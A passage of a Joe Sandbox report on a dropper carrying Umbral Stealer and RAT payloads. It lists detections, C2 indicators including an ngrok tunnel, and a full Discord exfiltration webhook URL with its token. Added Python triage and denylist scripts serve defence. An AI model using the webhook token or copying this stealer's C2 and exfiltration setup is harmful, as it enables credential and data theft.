  |     network: 0.tcp.eu.ngrok.io 18.158.249.75, ports 19177, 49737, 49740 (AMAZON-02US, United States); 3.124.142.205, ports 19177, 49759, 49760 (AMAZON-02US, United States); 2 other IPs or domains
  |     signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 3 other signatures
  |     +-- netsh.exe (started) -> conhost.exe (started)
  |     +-- netsh.exe (started) -> conhost.exe (started)
  |     +-- netsh.exe (started) -> conhost.exe (started)
  +-- Umbral.exe (started)
  |     network: ip-api.com 208.95.112.1, ports 49734, 80 (TUT-ASUS, United States)
  |     signatures: Machine Learning detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
  |     +-- WMIC.exe (started) -> conhost.exe (started)
  +-- ANDYzz-protected.exe (started)
        network: keyauth.win 104.26.0.5, ports 443, 49733, 49735 (CLOUDFLARENETUS, United States)
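The network side of the graph, as an added example for this page (not code from Joe Sandbox or from the samples): given connection records constructed from the indicators the graph lists, plus one record built from the Discord webhook URL found in Umbral.exe memory rather than from a connection the graph shows, classify each endpoint and pull out the webhook ID a defender would put in an abuse report. Record field names are assumptions; 19177 is taken to be the tunnel's destination port (the 497xx ports being the client side), and the correlation rule for the bare-IP connection (same process and same destination port as a known tunnel endpoint) is the editor's suggestion, not something the sandbox asserts.

```python
"""Network triage for the behaviour-graph endpoints (added example, not report code)."""
import re
from urllib.parse import parse_qs, urlsplit

# ngrok TCP tunnels are reached at N.tcp[.region].ngrok.io on a port ngrok assigns;
# the egress IPs are cloud (AWS here), so the hostname pattern is the durable indicator.
NGROK_TCP = re.compile(r"^\d+\.tcp(?:\.[a-z]{2,3})?\.ngrok\.io$")
# Discord webhook path is /api/webhooks/<id>/<token>; the id is what an abuse report needs.
DISCORD_WEBHOOK = re.compile(r"^/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)$")

# Constructed records (field names assumed). The last one comes from the webhook URL in
# Umbral.exe memory, not from a connection the graph shows.
CONNECTIONS = [
    {"process": "svchost.exe", "host": "0.tcp.eu.ngrok.io", "dst_ip": "18.158.249.75", "dst_port": 19177},
    {"process": "svchost.exe", "host": "", "dst_ip": "3.124.142.205", "dst_port": 19177},
    {"process": "Umbral.exe", "host": "ip-api.com", "dst_ip": "208.95.112.1", "dst_port": 80,
     "url": "http://ip-api.com/line/?fields=hosting"},
    {"process": "ANDYzz-protected.exe", "host": "keyauth.win", "dst_ip": "104.26.0.5", "dst_port": 443,
     "url": "https://keyauth.win/api/1.0/"},
    {"process": "Umbral.exe", "host": "discord.com", "dst_ip": "", "dst_port": 443,
     "url": "https://discord.com/api/webhooks/1225910337656590376/"
            "EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-"},
]


def classify(conn):
    """Label one connection from its hostname and, when present, its URL."""
    host = (conn.get("host") or "").lower()
    if NGROK_TCP.match(host):
        return "c2_reverse_tunnel_ngrok"
    url = conn.get("url")
    if url:
        u = urlsplit(url)
        fields = parse_qs(u.query).get("fields", [""])[0].split(",")
        if u.hostname == "ip-api.com" and "hosting" in fields:
            return "anti_analysis_hosting_check"  # datacenter/colocation check before stealing
        if u.hostname in ("discord.com", "discordapp.com") and DISCORD_WEBHOOK.match(u.path):
            return "exfil_discord_webhook"
        if u.hostname == "keyauth.win":
            return "third_party_licensing_api"
    return "unclassified"


def webhook_id(url):
    """Webhook ID from a Discord webhook URL, or None (the token is never needed for reporting)."""
    m = DISCORD_WEBHOOK.match(urlsplit(url).path)
    return m.group(1) if m else None


def triage(conns):
    """Classify, then link bare-IP connections to a known C2 endpoint by (process, port)."""
    first = [(c, classify(c)) for c in conns]
    c2_keys = {(c["process"], c["dst_port"]) for c, k in first if k.startswith("c2_")}
    out = []
    for c, k in first:
        if k == "unclassified" and (c["process"], c["dst_port"]) in c2_keys:
            k = "c2_correlated_by_process_and_port"
        out.append((c["process"], c.get("host") or c["dst_ip"], c["dst_port"], k))
    return out


if __name__ == "__main__":
    for proc, endpoint, port, kind in triage(CONNECTIONS):
        print(f"{proc:22} {endpoint:22} {port:6} {kind}")
```

Two practical notes follow from the classification: blocking the AWS addresses behind ngrok is short-lived, so a detection should key on the `*.tcp.*.ngrok.io` name and on an unexpected process (here a fake svchost.exe in %TEMP%) opening a high-port TCP session; and the right response to the webhook is an abuse report with the ID and, if possible, a takedown, not a block of discord.com, which would only push the stealer to its fallback.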

Source | Detection | Scanner | Label
KvS2rT08PQ.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Cassiopeia
KvS2rT08PQ.exe | 72% | Virustotal |
KvS2rT08PQ.exe | 100% | Avira | TR/Dropper.Gen
KvS2rT08PQ.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Umbral.exe | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | 100% | Avira | TR/Redcap.pwthy
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Umbral.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | 50% | ReversingLabs | Win64.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | 65% | Virustotal |
C:\Users\user\AppData\Local\Temp\Umbral.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\Users\user\AppData\Local\Temp\Umbral.exe | 70% | Virustotal |
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Local\Temp\svchost.exe | 77% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
keyauth.win | 1% | Virustotal |
0.tcp.eu.ngrok.io | 16% | Virustotal |

Source | Detection | Scanner | Label
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | Virustotal |
https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_- | 0% | Virustotal |
http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMT | 0% | Virustotal |
https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9 | 0% | Virustotal |
http://www.founder.com.cn/cn/cThe | 0% | Virustotal |
https://discord.com/api/v10/users/ | 0% | Virustotal |
http://www.founder.com.cn/cn | 0% | Virustotal |
https://gunaui.com/api/licensing.php | 0% | Virustotal |
https://gunaui.com/pricing | 0% | Virustotal |
https://keyauth.win/api/1.0/ | 1% | Virustotal |
https://keyauth.win | 1% | Virustotal |
https://gunaframework.com/api/licensing.php | 1% | Virustotal |
http://microsoft.co | 1% | Virustotal |
http://www.zhongyicts.com.cn | 1% | Virustotal |
https://gunaui.com/ | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
keyauth.win | 104.26.0.5 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
0.tcp.eu.ngrok.io | 18.158.249.75 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_- | true | | unknown
https://keyauth.win/api/1.0/ | false | | unknown
http://ip-api.com/line/?fields=hosting | false | | high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://discord.com/api/v10/users/Umbral.exe.0.drfalseunknown
                        http://www.fontbureau.com/designers/?ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bTheANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://keyauth.winANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://schemas.datacontract.org/2004/07/ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://microsoft.coUmbral.exe, 00000001.00000002.1699911979.00000253FB552000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          http://www.fontbureau.com/designers?ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://discordapp.com/api/v9/users/Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drfalse
                              high
                              http://www.tiro.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmptrueunknown
                              http://www.fontbureau.com/designersANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.goodfont.co.krANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comlANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMT | ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.galapagosdesign.com/staff/dennis.htm | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Blank-c/Umbral-Stealer | Umbral.exe.0.dr | false | | high
http://www.founder.com.cn/cn | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com/designers/frere-user.html | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gunaframework.com/api/licensing.php | ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.jiyu-kobo.co.jp/ | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | Umbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000002.1697775557.0000025380108000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gunaui.com/api/licensing.php | ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.urwpp.deDPlease | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Umbral.exe, 00000001.00000002.1697775557.000002538008E000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gunaui.com/ | ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://gunaui.com/pricing | ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://ip-api.com/json/?fields=225545 | Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | false | | high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States (US) | 53334 | TUT-AS | false
3.125.223.134 | unknown | United States (US) | 16509 | AMAZON-02 | true
3.125.209.94 | unknown | United States (US) | 16509 | AMAZON-02 | true
104.26.0.5 | keyauth.win | United States (US) | 13335 | CLOUDFLARENET | false
3.124.142.205 | unknown | United States (US) | 16509 | AMAZON-02 | true
18.158.249.75 | 0.tcp.eu.ngrok.io | United States (US) | 16509 | AMAZON-02 | true
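The contacted-IP rows above come from a rendered table whose ASN, ASN name, country code and malicious flag are run together in a plain-text export (for example "16509AMAZON-02UStrue"). The following Python is an added example, not part of the Joe Sandbox report, that splits such rows back into fields and derives a denylist of the addresses the report marks malicious. The sample input is constructed from the six rows above; the regular expressions assume the three-line row shape and an English country name with capitalised words, which is all this report shows, and raise on anything else rather than silently dropping a row.

```python
"""Rebuild the contacted-IP table from a plain-text export of a Joe Sandbox report.

Added example; CONTACTED_IPS_TEXT is constructed from the six rows of this report.
"""
import re
from typing import Dict, List, Set

# Constructed sample input: three lines per row
# (IP, domain+country run together, ASN+ASN name+country code+malicious run together).
CONTACTED_IPS_TEXT = """\
208.95.112.1
ip-api.comUnited States
53334TUT-ASUSfalse
3.125.223.134
unknownUnited States
16509AMAZON-02UStrue
3.125.209.94
unknownUnited States
16509AMAZON-02UStrue
104.26.0.5
keyauth.winUnited States
13335CLOUDFLARENETUSfalse
3.124.142.205
unknownUnited States
16509AMAZON-02UStrue
18.158.249.75
0.tcp.eu.ngrok.ioUnited States
16509AMAZON-02UStrue
"""

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# "ip-api.comUnited States": the shortest domain prefix that leaves a capitalised
# country name. Assumption: country names are capitalised English words (true here).
DOMAIN_COUNTRY_RE = re.compile(r"^(?P<domain>.+?)(?P<country>[A-Z][a-z]+(?: [A-Z][a-z]+)*)$")
# "16509AMAZON-02UStrue": ASN digits, ASN name, two-letter country code, malicious flag.
ASN_RE = re.compile(r"^(?P<asn>\d+)(?P<asname>.+?)(?P<cc>[A-Z]{2})(?P<malicious>true|false)$")

Row = Dict[str, object]


def parse_contacted_ips(text: str) -> List[Row]:
    """Return one dict per contacted IP with the original columns restored.

    Raises ValueError on a row that does not follow the expected shape: for IOC
    handling a loud failure is preferable to a silently missing C2 address.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("expected three lines per row, got %d lines" % len(lines))
    rows: List[Row] = []
    for i in range(0, len(lines), 3):
        ip, dom_line, asn_line = lines[i:i + 3]
        if not IPV4_RE.match(ip):
            raise ValueError("not an IPv4 address: %r" % ip)
        dm = DOMAIN_COUNTRY_RE.match(dom_line)
        am = ASN_RE.match(asn_line)
        if dm is None or am is None:
            raise ValueError("unparseable row for %s: %r / %r" % (ip, dom_line, asn_line))
        rows.append({
            "ip": ip,
            "domain": None if dm["domain"] == "unknown" else dm["domain"],
            "country": dm["country"],
            "asn": int(am["asn"]),
            "asn_name": am["asname"],
            "country_code": am["cc"],
            "malicious": am["malicious"] == "true",
        })
    return rows


def malicious_ips(rows: List[Row]) -> Set[str]:
    """Addresses the report flags as malicious (here: the AWS hosts behind the ngrok tunnel)."""
    return {str(r["ip"]) for r in rows if r["malicious"]}


def denylist_lines(rows: List[Row]) -> List[str]:
    """One 'ip  # comment' line per flagged address, ready for a firewall or proxy denylist."""
    return [
        "%s  # %s AS%d %s" % (r["ip"], r["domain"] or "no-rdns", r["asn"], r["asn_name"])
        for r in rows if r["malicious"]
    ]


if __name__ == "__main__":
    for line in denylist_lines(parse_contacted_ips(CONTACTED_IPS_TEXT)):
        print(line)
```

All four flagged addresses sit in AS16509, and the only one with a resolved name is 0.tcp.eu.ngrok.io; the other three appear in the domain table further down as earlier resolutions of that same ngrok host for other njRAT samples. ngrok TCP endpoints are shared by many unrelated tunnels, so treat the IP denylist as short-lived and prefer alerting on DNS resolution of *.tcp.eu.ngrok.io from hosts that have no business using ngrok.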
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1429103
Start date and time: 2024-04-20 21:31:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KvS2rT08PQ.exe (renamed because the original name is a hash value)
Original Sample Name: 2784277bd68152abf75c6c6d59fab7af.exe
Detection: MAL
Classification: mal100.spre.phis.troj.spyw.evad.winEXE@19/9@6/6
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 56%
• Number of executed functions: 155
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 173.194.219.94, 173.194.219.120
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target KvS2rT08PQ.exe, PID 6500 because it is empty
• Execution Graph export aborted for target Umbral.exe, PID 2180 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
Time | Type | Description
21:31:57 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
21:31:58 | API Interceptor | 946846x Sleep call for process: ANDYzz-protected.exe modified
21:31:59 | API Interceptor | 1x Sleep call for process: Umbral.exe modified
21:32:31 | API Interceptor | 425848x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | T1SEuO2fxi.exe | malicious | Xehook Stealer | ip-api.com/json/?fields=11827
208.95.112.1 | xnNcI6OenKJs.exe | malicious | Quasar | ip-api.com/json/
208.95.112.1 | T1SEuO2fxi.exe | malicious | Xehook Stealer | ip-api.com/json/?fields=11827
208.95.112.1 | rMayNewPurchase.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | rRECEIPTTRANSFE.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | charesworh.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | FAR.N_2430-240009934.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
3.125.223.134 | lLX6Po7hFJ.exe | malicious | Nanocore |
3.125.223.134 | aXDh3Stgy2.exe | malicious | Njrat |
3.125.223.134 | AKsHpy5O2W.exe | malicious | Njrat |
3.125.223.134 | P1Oyl92c7q.exe | malicious | Njrat |
3.125.223.134 | Z5355AqwOr.exe | malicious | Njrat |
3.125.223.134 | OkT2NAJRba.exe | malicious | Njrat |
3.125.223.134 | aLbc2QiwYI.exe | malicious | Njrat |
3.125.223.134 | G1oJ1idmVw.dll | malicious | GhostRat |
3.125.223.134 | X1YSjOIudz.exe | malicious | Njrat |
3.125.223.134 | hitler.exe | malicious | Njrat |
3.125.209.94 | xaa.doc.docx | malicious | CVE-2021-40444 | 259f-88-231-63-13.eu.ngrok.io/exploit.html
Match | Associated Sample Name / URL | Detection | Threat Name | Context
0.tcp.eu.ngrok.io | lLX6Po7hFJ.exe | malicious | Nanocore | 3.125.223.134
0.tcp.eu.ngrok.io | aXDh3Stgy2.exe | malicious | Njrat | 18.158.249.75
0.tcp.eu.ngrok.io | 9VnALqFMbF.exe | malicious | DarkComet | 3.125.209.94
0.tcp.eu.ngrok.io | AKsHpy5O2W.exe | malicious | Njrat | 3.125.223.134
0.tcp.eu.ngrok.io | D6p5mclMzu.exe | malicious | Njrat | 3.124.142.205
0.tcp.eu.ngrok.io | P1Oyl92c7q.exe | malicious | Njrat | 3.124.142.205
0.tcp.eu.ngrok.io | F1RBq1AGOt.exe | malicious | Njrat | 3.125.209.94
0.tcp.eu.ngrok.io | 8egiXe8bX1.exe | malicious | RedLine | 3.125.102.39
0.tcp.eu.ngrok.io | hIn6sixPtb.exe | malicious | Njrat | 3.124.142.205
0.tcp.eu.ngrok.io | chrome.exe | malicious | XWorm | 18.192.31.165
keyauth.win | SecuriteInfo.com.Win64.TrojanX-gen.26710.19883.exe | malicious | Unknown | 104.26.0.5
keyauth.win | RAvynkVRMR.exe | malicious | Unknown | 104.26.0.5
keyauth.win | RAvynkVRMR.exe | malicious | Unknown | 104.26.0.5
keyauth.win | loader.exe | malicious | Binder HackTool, XWorm | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exe | malicious | Unknown | 104.26.0.5
keyauth.win | vIXP03a.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win32.MalwareX-gen.12374.8764.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win32.MalwareX-gen.12374.8764.exe | malicious | Unknown | 104.26.0.5
keyauth.win | SecuriteInfo.com.Win64.TrojanX-gen.21257.15643.exe | malicious | Unknown | 104.26.0.5
ip-api.com | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | T1SEuO2fxi.exe | malicious | Xehook Stealer | 208.95.112.1
ip-api.com | xnNcI6OenKJs.exe | malicious | Quasar | 208.95.112.1
ip-api.com | T1SEuO2fxi.exe | malicious | Xehook Stealer | 208.95.112.1
ip-api.com | rMayNewPurchase.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | rRECEIPTTRANSFE.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | charesworh.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | FAR.N_2430-240009934.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02 (US) | http://134.213.29.14:82/grep.x86_64 | malicious | Unknown | 3.163.115.8
AMAZON-02 (US) | lLX6Po7hFJ.exe | malicious | Nanocore | 18.158.249.75
AMAZON-02 (US) | qk9TaBBxh8.exe | malicious | LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 52.216.33.65
AMAZON-02 (US) | https://prayas.co/assets/nagateliteqfuk.exe | malicious | Unknown | 3.72.134.250
AMAZON-02 (US) | https://19apmic17.z13.web.core.windows.net/ | malicious | TechSupportScam | 3.161.188.93
AMAZON-02 (US) | https://bestjavporn58xxcom.z13.web.core.windows.net/index.html | malicious | Unknown | 108.138.82.189
AMAZON-02 (US) | https://hentaieracomxx.z13.web.core.windows.net/index.html | malicious | Unknown | 108.138.82.203
AMAZON-02 (US) | PO_PDF24172024.scr.exe | malicious | FormBook | 75.2.60.5
AMAZON-02 (US) | https://19apmic11.z13.web.core.windows.net/ | malicious | TechSupportScam | 99.86.229.70
AMAZON-02 (US) | https://allmylinkswebgt.z13.web.core.windows.net/index.html | malicious | Unknown | 108.138.82.231
CLOUDFLARENET (US) | SecuriteInfo.com.Win64.Malware-gen.26781.23689.exe | malicious | Unknown | 104.21.81.28
CLOUDFLARENET (US) | SajWKdHxdF.exe | malicious | RisePro Stealer | 104.26.5.15
CLOUDFLARENET (US) | file.exe | malicious | LummaC | 104.21.15.198
CLOUDFLARENET (US) | file.exe | malicious | RisePro Stealer | 104.26.4.15
CLOUDFLARENET (US) | file.exe | malicious | LummaC | 172.67.177.98
CLOUDFLARENET (US) | 2M1NS61GG8.exe | malicious | LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT | 172.67.129.243
CLOUDFLARENET (US) | RrHuyQ4GzG.exe | malicious | LummaC | 104.21.86.106
CLOUDFLARENET (US) | https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94d | malicious | Unknown | 172.67.74.40
CLOUDFLARENET (US) | jNeaezBuo8.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | 104.21.4.208
CLOUDFLARENET (US) | 74fa486WVX.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | 104.21.76.57
TUT-AS (US) | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla | 208.95.112.1
